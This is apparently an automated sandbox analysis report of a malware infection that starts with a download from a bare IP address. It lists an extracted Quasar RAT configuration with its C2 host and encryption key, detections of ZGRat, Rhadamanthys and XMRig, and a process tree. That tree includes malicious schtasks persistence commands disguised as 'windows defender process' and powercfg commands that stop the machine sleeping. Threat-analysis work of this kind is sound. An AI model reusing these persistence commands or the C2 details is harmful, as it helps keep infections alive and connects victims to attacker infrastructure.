Resubmissions

18-03-2024 18:43

240318-xddhfafd78 10

18-03-2024 18:31

240318-w6jz9afh4s 10

18-03-2024 18:08

240318-wqytgaeg87 10

Analysis

  • max time kernel
    231s
  • max time network
    237s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-03-2024 18:08

General

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

gjhfhgdg.insane.wang:3634

Mutex

5943d26f-e34d-4af2-bb6f-9aa3b1840ec8

Attributes
  • encryption_key

    997411AC284CD97048B61F90B41B906864F1171B

  • install_name

    dfsdff.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    windows defender process

  • subdirectory

    fsfsf

Signatures

  • Detect ZGRat V1 1 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 3 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 14 IoCs
  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Uses the VBS compiler for execution 1 TTPs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 6 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2416
      • C:\Windows\system32\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3880
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://94.156.66.151/
      1⤵
      • Enumerates system info in registry
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:4000
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff97bd99758,0x7ff97bd99768,0x7ff97bd99778
        2⤵
          PID:3984
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1776 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:2
          2⤵
            PID:2804
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
            2⤵
              PID:4952
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2248 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
              2⤵
                PID:1332
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3000 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:1
                2⤵
                  PID:3628
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3020 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:1
                  2⤵
                    PID:1584
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4360 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                    2⤵
                      PID:3668
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4624 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                      2⤵
                        PID:928
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4352 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:1
                        2⤵
                          PID:4700
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4940 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                          2⤵
                            PID:3536
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4972 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                            2⤵
                              PID:5124
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4968 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:1
                              2⤵
                                PID:5200
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5316 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:1
                                2⤵
                                  PID:5280
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5288 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                                  2⤵
                                    PID:5332
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4988 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                                    2⤵
                                      PID:5340
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4932 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                                      2⤵
                                        PID:5448
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4704 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                                        2⤵
                                          PID:5456
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3036 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                                          2⤵
                                            PID:5664
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5324 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                                            2⤵
                                              PID:5736
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3364 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                                              2⤵
                                                PID:5744
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5780 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                                                2⤵
                                                  PID:5856
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5684 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                                                  2⤵
                                                    PID:5932
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5752 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                                                    2⤵
                                                      PID:5940
                                                    • C:\Users\Admin\Downloads\ghfhhminfudk.exe
                                                      "C:\Users\Admin\Downloads\ghfhhminfudk.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:5560
                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
                                                        3⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:5632
                                                        • C:\Users\Admin\AppData\Local\Temp\ijvcoeh.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\ijvcoeh.exe"
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:5556
                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                            "schtasks" /create /tn "windows defender process" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\fsfsf\dfsdff.exe" /rl HIGHEST /f
                                                            5⤵
                                                            • Creates scheduled task(s)
                                                            PID:1184
                                                          • C:\Users\Admin\AppData\Roaming\fsfsf\dfsdff.exe
                                                            "C:\Users\Admin\AppData\Roaming\fsfsf\dfsdff.exe"
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:4700
                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                              "schtasks" /create /tn "windows defender process" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\fsfsf\dfsdff.exe" /rl HIGHEST /f
                                                              6⤵
                                                              • Creates scheduled task(s)
                                                              PID:5560
                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                        "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\hgjfhdgh"
                                                        3⤵
                                                          PID:1220
                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                          "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\hgjfhdgh\hgjfhdgh.exe'" /f
                                                          3⤵
                                                            PID:3480
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\hgjfhdgh\hgjfhdgh.exe'" /f
                                                              4⤵
                                                              • Creates scheduled task(s)
                                                              PID:5724
                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                            "cmd" /c copy "C:\Users\Admin\Downloads\ghfhhminfudk.exe" "C:\Users\Admin\AppData\Roaming\hgjfhdgh\hgjfhdgh.exe"
                                                            3⤵
                                                              PID:1612
                                                          • C:\Users\Admin\Downloads\hghghjhfhleviticus.exe
                                                            "C:\Users\Admin\Downloads\hghghjhfhleviticus.exe"
                                                            2⤵
                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                            • Executes dropped EXE
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:5904
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4584 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                                                            2⤵
                                                              PID:6036
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5632 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                                                              2⤵
                                                                PID:5164
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5036 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
                                                                2⤵
                                                                  PID:5144
                                                                • C:\Users\Admin\Downloads\gfgghdhwhatsup.exe
                                                                  "C:\Users\Admin\Downloads\gfgghdhwhatsup.exe"
                                                                  2⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  PID:5448
                                                                  • C:\Users\Admin\AppData\Local\Temp\ghghghg.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\ghghghg.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:3480
                                                                    • C:\Windows\system32\powercfg.exe
                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                      4⤵
                                                                        PID:6128
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                        4⤵
                                                                          PID:6124
                                                                        • C:\Windows\system32\powercfg.exe
                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                          4⤵
                                                                            PID:5896
                                                                          • C:\Windows\system32\powercfg.exe
                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                            4⤵
                                                                              PID:6040
                                                                            • C:\Windows\explorer.exe
                                                                              explorer.exe
                                                                              4⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of SendNotifyMessage
                                                                              PID:5448
                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                            "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\fgfdgd"
                                                                            3⤵
                                                                              PID:1196
                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                              "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                                                              3⤵
                                                                                PID:5936
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                                                                  4⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:6068
                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                "cmd" /c copy "C:\Users\Admin\Downloads\gfgghdhwhatsup.exe" "C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe"
                                                                                3⤵
                                                                                  PID:5884
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2556 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:2
                                                                                2⤵
                                                                                  PID:5960
                                                                              • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                1⤵
                                                                                  PID:816
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3972 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8
                                                                                  1⤵
                                                                                    PID:5176
                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                                    1⤵
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Checks processor information in registry
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:5444
                                                                                  • C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
                                                                                    C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5128
                                                                                  • C:\Windows\system32\mmc.exe
                                                                                    "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
                                                                                    1⤵
                                                                                    • Drops file in System32 directory
                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:6024
                                                                                  • C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
                                                                                    C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
                                                                                    1⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    PID:1352
                                                                                    • C:\Users\Admin\AppData\Local\Temp\ghghghg.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\ghghghg.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:3712
                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                        3⤵
                                                                                          PID:3404
                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                          3⤵
                                                                                            PID:1104
                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                            3⤵
                                                                                              PID:2596
                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                              3⤵
                                                                                                PID:5388
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\fgfdgd"
                                                                                              2⤵
                                                                                                PID:4528
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                                                                                2⤵
                                                                                                  PID:2464
                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                    schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                                                                                    3⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:2308
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  "cmd" /c copy "C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe"
                                                                                                  2⤵
                                                                                                    PID:1904
                                                                                                • C:\Windows\System32\rundll32.exe
                                                                                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                  1⤵
                                                                                                    PID:836
                                                                                                  • C:\Windows\system32\OpenWith.exe
                                                                                                    C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:2056
                                                                                                    • C:\Windows\system32\NOTEPAD.EXE
                                                                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe.config
                                                                                                      2⤵
                                                                                                      • Opens file in notepad (likely ransom note)
                                                                                                      PID:5464
                                                                                                  • C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
                                                                                                    C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
                                                                                                    1⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4116
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ghghghg.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\ghghghg.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3320
                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                        3⤵
                                                                                                          PID:5380
                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                          3⤵
                                                                                                            PID:1176
                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                            3⤵
                                                                                                              PID:4452
                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                              3⤵
                                                                                                                PID:2252
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\fgfdgd"
                                                                                                              2⤵
                                                                                                                PID:5388
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                                                                                                2⤵
                                                                                                                  PID:6028
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                                                                                                    3⤵
                                                                                                                    • Creates scheduled task(s)
                                                                                                                    PID:3660
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  "cmd" /c copy "C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe"
                                                                                                                  2⤵
                                                                                                                    PID:5304
                                                                                                                • C:\Users\Admin\AppData\Roaming\fsfsf\dfsdff.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\fsfsf\dfsdff.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:1184
                                                                                                                • C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3904
                                                                                                                • C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:4856
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ghghghg.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\ghghghg.exe"
                                                                                                                    2⤵
                                                                                                                      PID:5836
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\fgfdgd"
                                                                                                                      2⤵
                                                                                                                        PID:428
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                                                                                                        2⤵
                                                                                                                          PID:5376
                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                            schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                                                                                                            3⤵
                                                                                                                            • Creates scheduled task(s)
                                                                                                                            PID:5096
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          "cmd" /c copy "C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe"
                                                                                                                          2⤵
                                                                                                                            PID:5676

                                                                                                                        Network

                                                                                                                        • flag-nl
                                                                                                                          GET
                                                                                                                          http://94.156.66.151/
                                                                                                                          chrome.exe
                                                                                                                          Remote address:
                                                                                                                          94.156.66.151:80
                                                                                                                          Request
                                                                                                                          GET / HTTP/1.1
                                                                                                                          Host: 94.156.66.151
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
